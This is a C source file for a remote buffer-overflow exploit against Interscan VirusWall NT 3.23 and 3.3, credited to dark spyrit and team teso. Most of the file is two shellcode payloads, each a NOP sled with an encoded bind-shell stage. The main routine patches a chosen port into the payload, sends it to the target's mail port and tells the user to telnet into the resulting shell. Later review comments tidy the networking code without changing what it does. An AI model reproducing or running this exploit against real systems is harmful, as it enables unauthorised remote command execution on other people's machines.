/* Interscan VirusWall 3.23/3.3 remote
* by dark spyrit <dspyrit@beavuh.org>
* quick unix port by team teso (http://teso.scene.at/).
*
* further information at http://www.beavuh.org.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
/* local functions
*/
/* Print the command-line synopsis to stdout and exit(EXIT_FAILURE); never returns. */
void usage (void);
/* Resolve a dotted-quad string or a host name to an IPv4 address in network
 * byte order; returns 0 when the name cannot be resolved. */
unsigned long int net_resolve (char *host);
/* Connect a TCP socket to server:port, giving up after `sec` seconds.
 * Fills in *cs with the peer address. Returns the connected descriptor, or
 * -1 on failure (errno is set to ETIMEDOUT or the pending SO_ERROR on the
 * paths that know the cause). */
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
/* shellcode by dark spyrit
*/
unsigned long sploit_323_len = 1314;
unsigned char sploit_323[] =
"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xbb\x10\x0b\x11\x01\xc1\xeb"
"\x02\x8b\xf8\x33\xc0\x50\x48\x90\x50\x59\xf2\xaf"
"\x59\xb1\xc6\x8b\xc7\x48\x80\x30\x99\xe2\xfa\x33"
"\xf6\x96\x90\x90\x56\xff\x13\x8b\xd0\xfc\x33\xc9"
"\xb1\x0b\x49\x32\xc0\xac\x84\xc0\x75\xf9\x52\x51"
"\x56\x52\x66\xbb\x34\x43\xff\x13\xab\x59\x5a\xe2"
"\xec\x32\xc0\xac\x84\xc0\x75\xf9\x66\xbb\xc4\x42"
"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x06\x32\xc0"
"\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\x66\xbb\x34"
"\x43\xff\x13\xab\x59\x5a\xe2\xec\x83\xc6\x05\x33"
"\xc0\x50\x40\x50\x40\x50\xff\x57\xe8\x93\x6a\x10"
"\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33"
"\xc0\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x48"
"\x50\x57\x56\xad\x56\xff\x57\xc0\x48\x50\x57\xad"
"\x56\xad\x56\xff\x57\xc0\x48\xb0\x44\x89\x07\x57"
"\xff\x57\xc4\x33\xc0\x8b\x46\xf4\x89\x47\x3c\x89"
"\x47\x40\x8b\x06\x89\x47\x38\x33\xc0\x66\xb8\x01"
"\x01\x89\x47\x2c\x57\x57\x33\xc0\x50\x50\x50\x40"
"\x50\x48\x50\x50\xad\x56\x33\xc0\x50\xff\x57\xc8"
"\xff\x76\xf0\xff\x57\xcc\xff\x76\xfc\xff\x57\xcc"
"\x48\x50\x50\x53\xff\x57\xf4\x8b\xd8\x33\xc0\xb4"
"\x04\x50\xc1\xe8\x04\x50\xff\x57\xd4\x8b\xf0\x33"
"\xc0\x8b\xc8\xb5\x04\x50\x50\x57\x51\x50\xff\x77"
"\xa8\xff\x57\xd0\x83\x3f\x01\x7c\x22\x33\xc0\x50"
"\x57\xff\x37\x56\xff\x77\xa8\xff\x57\xdc\x0b\xc0"
"\x74\x2f\x33\xc0\x50\xff\x37\x56\x53\xff\x57\xf8"
"\x6a\x50\xff\x57\xe0\xeb\xc8\x33\xc0\x50\xb4\x04"
"\x50\x56\x53\xff\x57\xfc\x57\x33\xc9\x51\x50\x56"
"\xff\x77\xac\xff\x57\xd8\x6a\x50\xff\x57\xe0\xeb"
"\xaa\x50\xff\x57\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5"
"\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9"
"\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9"
"\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc"
"\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6"
"\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc"
"\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde"
"\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce"
"\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8"
"\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99"
"\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99"
"\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2"
"\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed"
"\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc"
"\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x9b\x99"
"\xff\xff" /* 16 bit remote port number */
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xff\xff\xff\xff"
"\x60\x45\x42\x00\x0d\x0a";
unsigned long sploit_33_len = 794;
unsigned char sploit_33[] =
"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4b\x8b"
"\xc3\xbb\x01\x90\x16\x01\xc1\xeb\x02\x8b\xf8\x33"
"\xc0\x50\x48\x90\x50\x59\xf2\xaf\x59\xb1\xc6\x8b"
"\xc7\x48\x80\x30\x99\xe2\xfa\x33\xf6\x96\x90\x90"
"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x0b\x49\x32"
"\xc0\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\xb3\x80"
"\x90\x90\xff\x13\xab\x59\x5a\xe2\xec\x32\xc0\xac"
"\x84\xc0\x75\xf9\xb3\x01\x4b\x90\x56\xff\x13\x8b"
"\xd0\xfc\x33\xc9\xb1\x06\x32\xc0\xac\x84\xc0\x75"
"\xf9\x52\x51\x56\x52\xb3\x80\x90\x90\xff\x13\xab"
"\x59\x5a\xe2\xec\x83\xc6\x05\x33\xc0\x50\x40\x50"
"\x40\x50\xff\x57\xe8\x93\x6a\x10\x56\x53\xff\x57"
"\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0\x57\x50\xb0"
"\x0c\xab\x58\xab\x40\xab\x5f\x48\x50\x57\x56\xad"
"\x56\xff\x57\xc0\x48\x50\x57\xad\x56\xad\x56\xff"
"\x57\xc0\x48\xb0\x44\x89\x07\x57\xff\x57\xc4\x33"
"\xc0\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\x8b\x06"
"\x89\x47\x38\x33\xc0\x66\xb8\x01\x01\x89\x47\x2c"
"\x57\x57\x33\xc0\x50\x50\x50\x40\x50\x48\x50\x50"
"\xad\x56\x33\xc0\x50\xff\x57\xc8\xff\x76\xf0\xff"
"\x57\xcc\xff\x76\xfc\xff\x57\xcc\x48\x50\x50\x53"
"\xff\x57\xf4\x8b\xd8\x33\xc0\xb4\x04\x50\xc1\xe8"
"\x04\x50\xff\x57\xd4\x8b\xf0\x33\xc0\x8b\xc8\xb5"
"\x04\x50\x50\x57\x51\x50\xff\x77\xa8\xff\x57\xd0"
"\x83\x3f\x01\x7c\x22\x33\xc0\x50\x57\xff\x37\x56"
"\xff\x77\xa8\xff\x57\xdc\x0b\xc0\x74\x2f\x33\xc0"
"\x50\xff\x37\x56\x53\xff\x57\xf8\x6a\x50\xff\x57"
"\xe0\xeb\xc8\x33\xc0\x50\xb4\x04\x50\x56\x53\xff"
"\x57\xfc\x57\x33\xc9\x51\x50\x56\xff\x77\xac\xff"
"\x57\xd8\x6a\x50\xff\x57\xe0\xeb\xaa\x50\xff\x57"
"\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda"
"\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc"
"\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6"
"\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa"
"\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8"
"\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4"
"\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8"
"\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc"
"\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5"
"\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xdc\xe1\xf0\xed"
"\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xce\xca\xd6\xda"
"\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb"
"\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8"
"\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb"
"\xfc\xfa\xef\x99\x9b\x99"
"\xff\xff" /* sploit port number */
"\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\xb7"
"\xfc\xe1\xfc\x99\xff\xff\xff\xff\x09\x1f\x40\x00"
"\x0d\x0ah";
/* Print the command-line synopsis to stdout and terminate the process with
 * EXIT_FAILURE. Does not return. */
void
usage (void)
{
static const char synopsis[] =
"Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.\n"
"by dark spyrit <dspyrit@beavuh.org>\n"
"quick unix port by team teso\n\n"
"usage: vwxploit <host> <port> <port to bind shell> <version>\n"
"eg - vwxploit host.com 25 1234 3.23\n";
/* No conversion specifiers in the text, so fputs() emits exactly what
 * printf() did. */
fputs (synopsis, stdout);
exit (EXIT_FAILURE);
}
/* Entry point: vwxploit <host> <port> <port to bind shell> <version>
 *
 * Selects the payload array matching <version>, writes <port to bind shell>
 * into the two-byte placeholder inside it, sends the payload to <host>:<port>
 * and exits. Exit status is EXIT_SUCCESS once the bytes have been handed to
 * write(), EXIT_FAILURE on a usage error, an unknown version or a failed
 * connect.
 */
int
main (int argc, char **argv)
{
/* NOTE(review): `socket` shadows the libc socket() function within main.
 * Harmless because main never calls socket() itself, but confusing. */
int socket;
unsigned char *shellcode;
unsigned char *sh_port_offset;
char *server;
unsigned short int port_dest, port_shell;
size_t sh_len;
struct sockaddr_in sa;
if (argc != 5)
usage ();
server = argv[1];
/* atoi() yields 0 for non-numeric input, which the check below rejects;
 * values above 65535 are silently truncated by the unsigned short. */
port_dest = atoi (argv[2]);
port_shell = atoi (argv[3]);
if (port_dest == 0 || port_shell == 0)
usage ();
/* Each payload carries a two-byte "\xff\xff" port placeholder at a fixed
 * offset; sh_port_offset points at it. The offsets are tied to the exact
 * byte layout of the arrays above and must change together with them.
 * sh_len is the declared length, not sizeof the array. */
if (strcmp (argv[4], "3.23") == 0)
{
shellcode = sploit_323;
sh_len = sploit_323_len;
sh_port_offset = sploit_323 + 1282;
}
else if (strcmp (argv[4], "3.3") == 0)
{
shellcode = sploit_33;
sh_len = sploit_33_len;
sh_port_offset = sploit_33 + 762;
}
else
{
fprintf (stderr, "unsupported version\n");
exit (EXIT_FAILURE);
}
/* The port is XORed with 0x9999 and stored high byte first. */
port_shell ^= 0x9999;
*sh_port_offset = (char) ((port_shell >> 8) & 0xff);
*(sh_port_offset + 1) = (char) (port_shell & 0xff);
/* 45-second connect timeout; net_connect() returns -1 on any failure. */
socket = net_connect (&sa, server, port_dest, 45);
if (socket <= 0)
{
perror ("net_connect");
exit (EXIT_FAILURE);
}
/* NOTE(review): the return value of write() is ignored, so a short or
 * failed write is still reported as success below. */
write (socket, shellcode, sh_len);
/* presumably lets the data drain before the close — TODO confirm */
sleep (1);
close (socket);
/* argv[3] is re-parsed because port_shell was XOR-scrambled above. */
printf ("data send, try \"telnet %s %d\" now\n",
argv[1], atoi (argv[3]));
exit (EXIT_SUCCESS);
}
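/* Resolve `host`, given as a dotted-quad string or a host name, to an IPv4
 * address in network byte order.
 *
 * Returns the address, or 0 when `host` is NULL or neither inet_addr() nor
 * gethostbyname() can interpret the string. 0.0.0.0 is therefore not
 * distinguishable from failure; that in-band sentinel is kept because
 * callers test the result against 0.
 */
unsigned long int
net_resolve (char *host)
{
in_addr_t addr;
struct hostent *he;
struct in_addr in;
if (host == NULL)
return (0);
/* inet_addr() signals a bad string with INADDR_NONE (0xffffffff), not -1.
 * The original compared a `long` against -1, which never matches on LP64,
 * so every non-numeric host was passed on as 255.255.255.255. */
addr = inet_addr (host);
if (addr != INADDR_NONE)
return ((unsigned long int) addr);
he = gethostbyname (host);
if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL
|| he->h_length != (int) sizeof in)
return (0);
/* h_addr_list[0] is a 4-byte in_addr; copy it instead of dereferencing it
 * as an unsigned long, which reads past its end on 64-bit hosts. */
memcpy (&in, he->h_addr_list[0], sizeof in);
return ((unsigned long int) in.s_addr);
}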
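/* Open a TCP connection to server:port with a connect timeout of `sec`
 * seconds. *cs is filled in with the resolved peer address (AF_INET,
 * network-order port and address).
 *
 * Returns the connected descriptor, restored to blocking mode, on success.
 * Returns -1 on failure; no descriptor is leaked and errno names the cause
 * where it is known (EINVAL for NULL arguments, ETIMEDOUT when the timeout
 * expires, the pending SO_ERROR when the peer rejects the connection).
 */
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, error, flags;
int fd;
socklen_t len;
struct timeval tv;
fd_set rset, wset;
if (cs == NULL || server == NULL)
{
errno = EINVAL;
return (-1);
}
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
/* Resolve before opening the socket so a bad name costs no descriptor.
 * net_resolve() reports failure as 0. */
cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0)
return (-1);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
/* FD_SET() on a descriptor >= FD_SETSIZE is undefined behaviour. */
if (fd >= FD_SETSIZE)
{
errno = EMFILE;
goto fail;
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1)
goto fail;
/* Non-blocking connect so the timeout can be enforced with select(). */
if (fcntl (fd, F_SETFL, flags | O_NONBLOCK) == -1)
goto fail;
n = connect (fd, (struct sockaddr *) cs, sizeof *cs);
if (n == 0)
goto done;
if (errno != EINPROGRESS)
goto fail;
FD_ZERO (&rset);
FD_SET (fd, &rset);
wset = rset;
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select (fd + 1, &rset, &wset, NULL, &tv);
if (n == 0)
{
errno = ETIMEDOUT;
goto fail;
}
if (n == -1)
goto fail;
if (!FD_ISSET (fd, &rset) && !FD_ISSET (fd, &wset))
goto fail;
/* Readiness alone does not mean success: a refused connection also wakes
 * select(), so the pending socket error is read whenever either set fires,
 * not only when both do. */
error = 0;
len = sizeof error;
if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0)
goto fail;
if (error != 0)
{
errno = error;
goto fail;
}
done:
/* Back to blocking mode so the caller's write()/close() behave as usual. */
if (fcntl (fd, F_SETFL, flags) == -1)
goto fail;
return (fd);
fail:
/* Every error path closes the descriptor; close() may clobber errno, so
 * the cause is preserved for the caller's perror(). */
error = errno;
close (fd);
errno = error;
return (-1);
}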
/* www.hack.co.za [2000]*/